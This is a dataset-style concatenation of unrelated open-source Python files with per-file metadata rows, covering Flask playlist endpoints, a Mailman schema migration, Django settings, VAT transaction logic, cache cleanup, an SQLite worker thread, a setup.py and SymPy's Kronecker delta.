slugify.slugify(build_job["created_at"], separator="").replace(
"t", "_"
),
context_name,
slugify.slugify(playlist["name"], separator="_"),
)
return flask_send_file(
movie_file_path,
conditional=True,
mimetype="video/mp4",
as_attachment=True,
attachment_filename=attachment_filename,
)
class BuildPlaylistMovieResource(Resource):
@jwt_required
def get(self, playlist_id):
playlist = playlists_service.get_playlist(playlist_id)
user_service.check_manager_project_access(playlist["project_id"])
project = projects_service.get_project(playlist["project_id"])
(width, height) = preview_files_service.get_preview_file_dimensions(
project
)
fps = preview_files_service.get_preview_file_fps(project)
params = EncodingParameters(width=width, height=height, fps=fps)
shots = [
{"preview_file_id": x.get("preview_file_id")}
for x in playlist["shots"]
]
if config.ENABLE_JOB_QUEUE:
remote = config.ENABLE_JOB_QUEUE_REMOTE
# remote worker can not access files local to the web app
assert not remote or config.FS_BACKEND in ["s3", "swift"]
current_user = persons_service.get_current_user()
queue_store.job_queue.enqueue(
playlists_service.build_playlist_job,
args=(playlist, shots, params, current_user["email"], remote),
job_timeout=3600,
)
return {"job": "running"}
else:
job = playlists_service.build_playlist_movie_file(
playlist, shots, params, remote=False
)
return {"job": job["status"]}
class PlaylistZipDownloadResource(Resource):
@jwt_required
def get(self, playlist_id):
playlist = playlists_service.get_playlist(playlist_id)
project = projects_service.get_project(playlist["project_id"])
user_service.block_access_to_vendor()
user_service.check_playlist_access(playlist)
zip_file_path = playlists_service.build_playlist_zip_file(playlist)
context_name = slugify.slugify(project["name"], separator="_")
if project["production_type"] == "tvshow":
episode_id = playlist["episode_id"]
if episode_id is not None:
episode = shots_service.get_episode(playlist["episode_id"])
episode_name = episode["name"]
elif playlist["is_for_all"]:
episode_name = "all assets"
else:
episode_name = "main pack"
context_name += "_%s" % slugify.slugify(episode_name, separator="_")
attachment_filename = "%s_%s.zip" % (
context_name,
slugify.slugify(playlist["name"], separator="_"),
)
return flask_send_file(
zip_file_path,
conditional=True,
mimetype="application/zip",
as_attachment=True,
attachment_filename=attachment_filename,
)
class BuildJobResource(Resource):
@jwt_required
def get(self, playlist_id, build_job_id):
user_service.block_access_to_vendor()
playlist = playlists_service.get_playlist(playlist_id)
user_service.check_playlist_access(playlist)
return playlists_service.get_build_job(build_job_id)
@jwt_required
def delete(self, playlist_id, build_job_id):
user_service.block_access_to_vendor()
playlist = playlists_service.get_playlist(playlist_id)
user_service.check_playlist_access(playlist)
playlists_service.remove_build_job(playlist, build_job_id)
return "", 204
class ProjectBuildJobsResource(Resource):
"""
Retrieve all build jobs related to given project.
It's mainly used for synchronisation purpose.
"""
@jwt_required
def get(self, project_id):
permissions.check_admin_permissions()
projects_service.get_project(project_id)
return playlists_service.get_build_jobs_for_project(project_id)
class ProjectAllPlaylistsResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given project.
It's mainly used for synchronisation purpose.
"""
@jwt_required
def get(self, project_id):
permissions.check_admin_permissions()
projects_service.get_project(project_id)
page = self.get_page()
return playlists_service.get_playlists_for_project(project_id, page)
class TempPlaylistResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given project.
It's mainly used for synchronisation purpose.
"""
@jwt_required
def post(self, project_id):
user_service.check_project_access(project_id)
task_ids = request.json.get("task_ids", [])
return playlists_service.generate_temp_playlist(task_ids) or []
|
agpl-3.0
| 1,423,871,682,942,486,500
| 34.443609
| 80
| 0.609037
| false
| 4.044616
| false
| false
| false
|
trevor/mailman3
|
src/mailman/database/schema/mm_20121015000000.py
|
1
|
3289
|
# Copyright (C) 2012-2014 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""3.0b2 -> 3.0b3 schema migrations.
Renamed:
* bans.mailing_list -> bans.list_id
Removed:
* mailinglist.new_member_options
 * mailinglist.send_reminders
"""
from __future__ import absolute_import, print_function, unicode_literals
__metaclass__ = type
__all__ = [
'upgrade',
]
from mailman.database.schema.helpers import make_listid, pivot
VERSION = '20121015000000'
def upgrade(database, store, version, module_path):
if database.TAG == 'sqlite':
upgrade_sqlite(database, store, version, module_path)
else:
upgrade_postgres(database, store, version, module_path)
def upgrade_sqlite(database, store, version, module_path):
database.load_schema(
store, version, 'sqlite_{}_01.sql'.format(version), module_path)
results = store.execute("""
SELECT id, mailing_list
FROM ban;
""")
for id, mailing_list in results:
# Skip global bans since there's nothing to update.
if mailing_list is None:
continue
store.execute("""
UPDATE ban_backup SET list_id = '{}'
WHERE id = {};
""".format(make_listid(mailing_list), id))
# Pivot the bans backup table to the real thing.
pivot(store, 'ban')
pivot(store, 'mailinglist')
def upgrade_postgres(database, store, version, module_path):
# Get the old values from the ban table.
results = store.execute('SELECT id, mailing_list FROM ban;')
store.execute('ALTER TABLE ban ADD COLUMN list_id TEXT;')
for id, mailing_list in results:
# Skip global bans since there's nothing to update.
if mailing_list is None:
continue
store.execute("""
UPDATE ban SET list_id = '{0}'
WHERE id = {1};
""".format(make_listid(mailing_list), id))
store.execute('ALTER TABLE ban DROP COLUMN mailing_list;')
store.execute('ALTER TABLE mailinglist DROP COLUMN new_member_options;')
store.execute('ALTER TABLE mailinglist DROP COLUMN send_reminders;')
store.execute('ALTER TABLE mailinglist DROP COLUMN subscribe_policy;')
store.execute('ALTER TABLE mailinglist DROP COLUMN unsubscribe_policy;')
store.execute(
'ALTER TABLE mailinglist DROP COLUMN subscribe_auto_approval;')
store.execute('ALTER TABLE mailinglist DROP COLUMN private_roster;')
store.execute(
'ALTER TABLE mailinglist DROP COLUMN admin_member_chunksize;')
# Record the migration in the version table.
database.load_schema(store, version, None, module_path)
|
gpl-3.0
| 3,540,926,000,866,135,600
| 32.561224
| 78
| 0.679842
| false
| 3.977025
| false
| false
| false
|
sixam/dw6824
|
src/ui/stroke.py
|
1
|
2694
|
import copy
from PyQt4 import QtCore, QtGui
from utils.utils import Utils
sizeX = 1024
sizeY = 768
class Stroke:
"""Basic Stroke"""
def __init__(self, path=[], width=0, color=[0,0,0,255], id='none'):
self.path = path
self.width = width
self.color = color
if id == 'none':
self.id = Utils.generateID()
else:
self.id = id
def __str__(self):
c = self.getBarycenter()
return "Stroke : %s - [%01.02f,%01.02f] - c: {0} - pts:{1}".format(self.color,len(self.path)) % (self.id[0:5],c[0]/sizeX,c[1]/sizeY)
def __copy__(self):
new = Stroke()
new.path = copy.copy(self.path);
new.width = copy.copy(self.width);
new.color = copy.copy(self.color);
new.id = copy.copy(self.id)
return new
def __cmp__(self, other):
eq = True
if self.path != other.path:
eq = False
if self.width != other.width:
eq = False
if self.color != other.color:
eq = False
if self.id != other.id:
eq = False
b1 = self.getBarycenter()
b2 = other.getBarycenter()
if b1[0]!=b2[0] or b1[1]!=b2[1]:
eq = False
if eq:
return 0
return -1
def marshall(self):
""" Wraps the stroke data into a RPC-friendly format """
packet = {}
packet['path'] = self.path
packet['width'] = self.width
packet['color'] = self.color
packet['id'] = self.id
return packet
def toPainterPath(self):
""" Transform the strokes to a QT line """
points = self.path
path = QtGui.QPainterPath(QtCore.QPointF(*points[0]));
for pt in points:
path.lineTo(QtCore.QPointF(*pt));
return path
def getBarycenter(self):
x = 0
y = 0
n = len(self.path)
if n > 0:
for pt in self.path:
x += pt[0]
y += pt[1]
x /= float(n)
y /= float(n)
return [x,y]
def moveTo(self,newpos):
""" Change the stroke position to the supplied location """
c = self.getBarycenter()
offset = [newpos[0]-c[0],newpos[1]-c[1]]
self.offsetPosBy(offset)
def offsetPosBy(self,offset):
""" Change the stroke position by an offset """
if isinstance(offset,QtCore.QPointF):
x = offset.x()
y = offset.y()
else:
x = offset[0]
y = offset[1]
for i,pt in enumerate(self.path):
pt[0] = pt[0] + x
pt[1] = pt[1] + y
|
bsd-3-clause
| 2,516,270,057,821,345,000
| 27.357895
| 140
| 0.489978
| false
| 3.467181
| false
| false
| false
|
daniyalzade/burgaz
|
settings.py
|
1
|
4442
|
import os
from shopify_settings import *
SITE_ROOT = os.path.dirname(os.path.realpath(__file__))
try:
from djangoappengine.settings_base import *
USING_APP_ENGINE = True
except ImportError:
USING_APP_ENGINE = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
        'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(SITE_ROOT, 'db-development.sqlite3'),
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(SITE_ROOT, 'static'),
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '#w%yp9_5wnupojr=4o0mwap#!)y=q9ovu=o#xnytga7u5^bf27'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'shopify_app.context_processors.current_shop',
)
if not USING_APP_ENGINE:
TEMPLATE_CONTEXT_PROCESSORS += (
'django.core.context_processors.static',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'shopify_app.middleware.LoginProtection',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(SITE_ROOT, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'home',
'shopify_app',
)
if USING_APP_ENGINE:
INSTALLED_APPS += (
'djangoappengine',
'djangotoolbox',
)
else:
INSTALLED_APPS += (
'django.contrib.sites',
'django.contrib.staticfiles',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
mit
| -8,659,885,461,204,517,000
| 30.062937
| 96
| 0.660288
| false
| 3.698585
| false
| false
| false
|
thijsmie/tantalus
|
src/tantalus/logic/transaction.py
|
1
|
9287
|
from tantalus_db.base import db
from tantalus_db.models import Referencing, Transaction, TransactionLine, ServiceLine, Relation, Product, BtwType
from tantalus_db.utility import get_or_none, transactional
from tantalus.logic.rows import transform_collection
from collections import defaultdict
from datetime import datetime
@transactional
def new_transaction(data):
relation = get_or_none(data['relation'], Relation)
if relation is None:
raise Exception("Relation does not exist!")
if relation.numbered_reference:
reference = Referencing.get_reference()
else:
reference = 0
tr = Transaction.query.filter(Transaction.relation == relation).order_by(
Transaction.informal_reference.desc()).first()
if tr is None:
informal_reference = 1
else:
informal_reference = tr.informal_reference + 1
t = Transaction(
reference=reference,
informal_reference=informal_reference,
relation=relation,
deliverydate=datetime.strptime(data["deliverydate"], "%Y-%m-%d").date(),
processeddate=datetime.now().date(),
description=data.get("description", ""),
two_to_one_has_btw=data.get("two_to_one_has_btw", False),
two_to_one_btw_per_row=data.get("two_to_one_btw_per_row", False)
)
for prd in data["sell"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = product.take(int(prd['amount']))
t.one_to_two.append(line)
for prd in data["buy"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = TransactionLine(
product=product,
amount=int(prd['amount']),
prevalue=int(prd['price']),
value=product.value * int(prd['amount']),
btwtype=product.btwtype
)
product.give(line)
t.two_to_one.append(line)
for prd in data["service"]:
btw = prd.get('btw', 0)
btwtype = BtwType.query.filter(BtwType.percentage == btw).first()
if btwtype is None:
btwtype = BtwType(
name=str(btw)+"%",
percentage=btw
)
db.session.add(btwtype)
line = ServiceLine(
service=prd['contenttype'],
amount=int(prd['amount']),
value=int(prd['price']),
btwtype=btwtype
)
t.services.append(line)
rec = transaction_record(t)
t.total = rec["total"]
db.session.add(t)
relation.budget -= rec["total"]
return t
@transactional
def edit_transaction(t, data):
# Easy stuff first
old_total = t.total
t.revision += 1
t.two_to_one_has_btw = data.get("two_to_one_has_btw", t.two_to_one_has_btw)
t.two_to_one_btw_per_row = data.get("two_to_one_btw_per_row", t.two_to_one_btw_per_row)
if "deliverydate" in data:
t.deliverydate = datetime.strptime(data["deliverydate"], "%Y-%m-%d").date()
if "description" in data:
t.description = data["description"]
newsell = []
for prd in data["sell"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = TransactionLine(
value=int(prd['amount'])*product.value,
prevalue=int(prd['amount'])*product.value,
amount=int(prd['amount']),
product=product,
btwtype=product.btwtype
)
newsell.append(line)
t.one_to_two = transform_collection(t.one_to_two, newsell, True)
newbuy = []
for prd in data["buy"]:
product = get_or_none(prd["id"], Product)
if product is None:
raise Exception("Product with id {} does not exist.".format(prd["id"]))
line = TransactionLine(
product=product,
amount=int(prd['amount']),
prevalue=int(prd['price']),
value=int(prd['amount'])*product.value,
btwtype=product.btwtype
)
newbuy.append(line)
t.two_to_one = transform_collection(t.two_to_one, newbuy, False)
t.services = []
for prd in data["service"]:
btw = prd.get('btw', 0)
btwtype = BtwType.query.filter(BtwType.percentage == btw).first()
if btwtype is None:
btwtype = BtwType(
name=str(btw)+"%",
percentage=btw
)
db.session.add(btwtype)
line = ServiceLine(
service=prd['contenttype'],
amount=int(prd['amount']),
value=int(prd['price']),
btwtype=btwtype
)
t.services.append(line)
record = transaction_record(t)
t.total = record["total"]
db.session.add(t)
t.relation.budget += old_total - t.total
return t
def make_row_record(row):
return {
"contenttype": row.product.contenttype,
"group": row.product.group.name,
"prevalue": row.prevalue,
"value": row.value,
"amount": row.amount,
"btw": row.btwtype.percentage
}
def make_service_record(row):
return {
"contenttype": row.service,
"amount": row.amount,
"prevalue": row.value,
"value": row.value,
"btw": row.btwtype.percentage
}
def transaction_process(transaction):
sellrows = [make_row_record(row) for row in transaction.one_to_two]
buyrows = [make_row_record(row) for row in transaction.two_to_one]
servicerows = [make_service_record(row) for row in transaction.services]
btwtotals = defaultdict(float)
btwvalues = defaultdict(int)
# Current total including btw, btw rounded per invoice
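    # For a gross (btw-inclusive) amount G at rate r percent, the btw (VAT)
    # component is G * (r/100) / (1 + r/100) = G * r / (100 + r).  Sell and
    # service rows enter the running btw totals with a negative sign, purchase
    # rows with a positive one.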
for row in sellrows:
btw = row["prevalue"] * row["btw"] / 100. / (row["btw"]/100. + 1)
btwtotals[row["btw"]] -= btw
btwvalues[row["btw"]] -= row["prevalue"]
row["btwvalue"] = btw
# Current total including btw, btw rounded per invoice
for row in servicerows:
btw = row["prevalue"] * row["btw"] / 100. / (row["btw"]/100. + 1)
btwtotals[row["btw"]] -= btw
btwvalues[row["btw"]] -= row["prevalue"]
row["btwvalue"] = btw
buybtwtotals = defaultdict(float)
for row in buyrows:
if transaction.two_to_one_has_btw:
if transaction.two_to_one_btw_per_row:
# Current total including btw, btw rounded per row
btw = round(row["prevalue"] * row["btw"] / 100.0 / (row["btw"]/100. + 1))
else:
# Current total including btw, btw rounded for full invoice
# We should use decimals here, but floats are good enough for now
btw = row["prevalue"] * row["btw"] / 100. / (row["btw"]/100. + 1)
else:
if transaction.two_to_one_btw_per_row:
# Current total excluding btw, btw rounded per row
btw = round(row["prevalue"] * row["btw"] / 100.0)
btwvalues[row["btw"]] += btw
else:
# Current total excluding btw, btw rounded for full invoice
# We should use decimals here, but floats are good enough for now
btw = row["prevalue"] * row["btw"] / 100.0
btwvalues[row["btw"]] += btw
btwvalues[row["btw"]] += row["prevalue"]
btwtotals[row["btw"]] += btw
buybtwtotals[row["btw"]] += btw
row["btwvalue"] = btw
row["value_exl"] = row["value"] * (1 - row["btw"] / 100.0 / (row["btw"]/100. + 1))
for k, v in btwtotals.items():
btwtotals[k] = int(round(v))
return dict(btwtotals), dict(btwvalues), dict(buybtwtotals), sellrows, buyrows, servicerows
def transaction_record(transaction):
btwtotals, btwvalues, buybtwtotals, sellrows, buyrows, servicerows = transaction_process(transaction)
selltotal = sum(r['prevalue'] for r in sellrows)
buytotal = sum(r['prevalue'] for r in buyrows)
servicetotal = sum(r['prevalue'] for r in servicerows)
total = selltotal - buytotal + servicetotal
if not transaction.two_to_one_has_btw:
total -= sum(buybtwtotals.values())
return {
"reference": str(transaction.reference).zfill(4),
"name": transaction.relation.name + " " + str(transaction.informal_reference).zfill(3),
"sell": sellrows,
"buy": buyrows,
"service": servicerows,
"selltotal": selltotal,
"buytotal": buytotal,
"btwtotals": btwtotals,
"btwvalues": btwvalues,
"btwtotal": sum(btwtotals.values()),
"servicetotal": servicetotal,
"description": transaction.description,
"processeddate": transaction.processeddate,
"deliverydate": transaction.deliverydate,
"total": int(total),
"id": transaction.id,
"revision": transaction.revision,
"lastedit": transaction.time_updated,
"two_to_one_has_btw": transaction.two_to_one_has_btw,
"two_to_one_btw_per_row": transaction.two_to_one_btw_per_row
}
|
mit
| 3,800,890,605,192,939,000
| 32.527076
| 113
| 0.582535
| false
| 3.501885
| false
| false
| false
|
jackrzhang/zulip
|
scripts/lib/clean_node_cache.py
|
1
|
2324
|
#!/usr/bin/env python3
import argparse
import os
import subprocess
import sys
if False:
from typing import Set
ZULIP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(ZULIP_PATH)
from scripts.lib.node_cache import generate_sha1sum_node_modules
from scripts.lib.zulip_tools import get_caches_to_be_purged, \
get_environment, get_recent_deployments, parse_cache_script_args, \
purge_unused_caches
ENV = get_environment()
NODE_MODULES_CACHE_PATH = "/srv/zulip-npm-cache"
if ENV == "travis":
NODE_MODULES_CACHE_PATH = os.path.join(os.environ["HOME"], "zulip-npm-cache")
try:
subprocess.check_output(["/home/travis/zulip-yarn/bin/yarn", '--version'])
except OSError:
print('yarn not found. Most probably we are running static-analysis and '
'hence yarn is not installed. Exiting without cleaning npm cache.')
sys.exit(0)
def get_caches_in_use(threshold_days):
# type: (int) -> Set[str]
setups_to_check = set([ZULIP_PATH, ])
caches_in_use = set()
if ENV == "prod":
setups_to_check |= get_recent_deployments(threshold_days)
if ENV == "dev":
# In dev always include the currently active cache in order
# not to break current installation in case dependencies
# are updated with bumping the provision version.
CURRENT_CACHE = os.path.dirname(os.path.realpath(os.path.join(ZULIP_PATH, "node_modules")))
caches_in_use.add(CURRENT_CACHE)
for setup_dir in setups_to_check:
node_modules_link_path = os.path.join(setup_dir, "node_modules")
if not os.path.islink(node_modules_link_path):
# If 'package.json' file doesn't exist then no node_modules
# cache is associated with this setup.
continue
# The actual cache path doesn't include the /node_modules
caches_in_use.add(os.path.dirname(os.readlink(node_modules_link_path)))
return caches_in_use
def main(args: argparse.Namespace) -> None:
caches_in_use = get_caches_in_use(args.threshold_days)
purge_unused_caches(
NODE_MODULES_CACHE_PATH, caches_in_use, "node modules cache", args)
if __name__ == "__main__":
args = parse_cache_script_args("This script cleans unused zulip npm caches.")
main(args)
|
apache-2.0
| 6,640,714,881,982,662,000
| 37.733333
| 99
| 0.673838
| false
| 3.373004
| false
| false
| false
|
MaxMorgenstern/EmeraldAI
|
EmeraldAI/Logic/Database/SQlite3.py
|
1
|
5843
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from cachetools import cached
from EmeraldAI.Logic.Singleton import Singleton
from EmeraldAI.Logic.Modules import Global
from EmeraldAI.Config.Config import Config
from EmeraldAI.Logic.Logger import FileLogger
class SQlite3(object):
__metaclass__ = Singleton
__Database = None
def __init__(self):
self.__Database = self.GetDB(Config().Get("Database", "SQliteDatabase"))
def GetDB(self, database):
return Worker(os.path.join(Global.EmeraldPath, "Data", "SqliteDB", database.rstrip(".sqlite") + ".sqlite"))
@cached(cache={})
def Execute(self, sql, args=None):
return self.ExecuteDB(self.__Database, sql, args)
def ExecuteDB(self, db, sql, args=None):
db.execute(sql, args)
return db.getLastrowid()
@cached(cache={})
def Fetchall(self, sql, args=None):
return self.FetchallDB(self.__Database, sql, args)
def FetchallCacheBreaker(self, sql, args=None):
return self.FetchallDB(self.__Database, sql, args)
def FetchallDB(self, db, sql, args=None):
return db.execute(sql, args)
def Disconnect(self):
self.DisconnectDB(self.__Database)
def DisconnectDB(self, db):
db.close()
###############################################################################
# Copyright (c) 2014 Palantir Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#__author__ = "Shawn Lee"
#__email__ = "dashawn@gmail.com"
#__license__ = "MIT"
#
# Thread safe sqlite3 interface.
import sqlite3
import threading
import uuid
try:
import queue as Queue # module re-named in Python 3
except ImportError:
import Queue
class Worker(threading.Thread):
def __init__(self, file_name, max_queue_size=100):
threading.Thread.__init__(self, name=__name__)
self.daemon = True
self._sqlite3_conn = sqlite3.connect(
file_name, check_same_thread=False,
detect_types=sqlite3.PARSE_DECLTYPES)
self._sqlite3_conn.text_factory = str
self._sqlite3_cursor = self._sqlite3_conn.cursor()
self._sql_queue = Queue.Queue(maxsize=max_queue_size)
self._results = {}
self._max_queue_size = max_queue_size
self._select_events = {}
self._close_event = threading.Event()
self._close_lock = threading.Lock()
self.start()
def run(self):
execute_count = 0
for token, query, values in iter(self._sql_queue.get, None):
if query:
self._run_query(token, query, values)
execute_count += 1
if (self._sql_queue.empty() or
execute_count == self._max_queue_size):
self._sqlite3_conn.commit()
execute_count = 0
if self._close_event.is_set() and self._sql_queue.empty():
self._sqlite3_conn.commit()
self._sqlite3_conn.close()
return
def _run_query(self, token, query, values):
if query.lower().strip().startswith("select"):
try:
self._sqlite3_cursor.execute(query, values)
self._results[token] = self._sqlite3_cursor.fetchall()
except sqlite3.Error as err:
self._results[token] = (
"Query returned error: %s: %s: %s" % (query, values, err))
finally:
self._select_events.setdefault(token, threading.Event())
self._select_events[token].set()
else:
try:
self._sqlite3_cursor.execute(query, values)
except sqlite3.Error as err:
# TODO
print(err)
def close(self):
with self._close_lock:
if not self.is_alive():
return "Already Closed"
self._close_event.set()
self._sql_queue.put(("", "", ""), timeout=5)
self.join()
@property
def queue_size(self):
return self._sql_queue.qsize()
def _query_results(self, token):
try:
self._select_events.setdefault(token, threading.Event())
self._select_events[token].wait()
return self._results[token]
finally:
self._select_events[token].clear()
del self._results[token]
del self._select_events[token]
def execute(self, query, values=None):
if self._close_event.is_set():
return "Close Called"
values = values or []
token = str(uuid.uuid4())
self._sql_queue.put((token, query, values), timeout=5)
if query.lower().strip().startswith("select"):
return self._query_results(token)
def getLastrowid(self):
return self._sqlite3_cursor.lastrowid
|
apache-2.0
| -8,573,672,131,020,047,000
| 33.988024
| 115
| 0.608249
| false
| 4.032436
| false
| false
| false
|
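A minimal usage sketch for the thread-safe Worker defined above. The SQlite3 wrapper needs the EmeraldAI config, so this talks to Worker directly; the import path is assumed from the file's location and the database file name is made up.
# Hedged example: drive the queue-backed Worker directly (assumes the EmeraldAI
# package and its dependencies are importable; file name is hypothetical).
from EmeraldAI.Logic.Database.SQlite3 import Worker
db = Worker("example.sqlite")
db.execute("CREATE TABLE IF NOT EXISTS notes (id INTEGER PRIMARY KEY, body TEXT)")
db.execute("INSERT INTO notes (body) VALUES (?)", ["hello"])
# SELECT statements block until the background thread publishes the result.
print(db.execute("SELECT id, body FROM notes"))
db.close()  # drains the queue, commits and closes the connection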
basho-labs/riak-mesos-tools
|
setup.py
|
1
|
4313
|
#
# Copyright (C) 2016 Basho Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages
from codecs import open
from os import path
from riak_mesos import constants
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='riak-mesos',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=constants.version,
description='Riak Mesos Command Line Interface',
long_description=long_description,
# The project's main homepage.
url='https://github.com/basho-labs/riak-mesos-tools',
# Author details
author='Basho Technologies, Inc.',
author_email='support@basho.com',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: TODO: License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='dcos command riak database mesosphere',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'docopt',
'dcos>=0.4.6,<0.4.12',
'kazoo',
'click',
'futures'
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax, for
# example:
# $ pip install -e .[dev,test]
extras_require={
'dev': ['check-manifest'],
'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
data_files=[],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'riak-mesos=riak_mesos.cli:cli'
],
},
)
|
apache-2.0
| 3,413,416,331,684,066,300
| 34.941667
| 79
| 0.663112
| false
| 4.061205
| false
| false
| false
|
fperez/sympy
|
sympy/functions/special/tensor_functions.py
|
1
|
1178
|
from sympy.core.function import Function
from sympy.core import sympify, S
from sympy.utilities.decorator import deprecated
###############################################################################
###################### Kronecker Delta, Levi-Civita etc. ######################
###############################################################################
class Dij(Function):
"""
Represents the Kronecker Delta Function
if i == j, Dij(i, j) = 1
otherwise Dij(i, j) = 0
where i, j are usually integers
"""
nargs = (1, 2)
@classmethod
def eval(cls, i, j=0):
i, j = map(sympify, (i, j))
if i == j:
return S.One
elif i.is_number and j.is_number:
return S.Zero
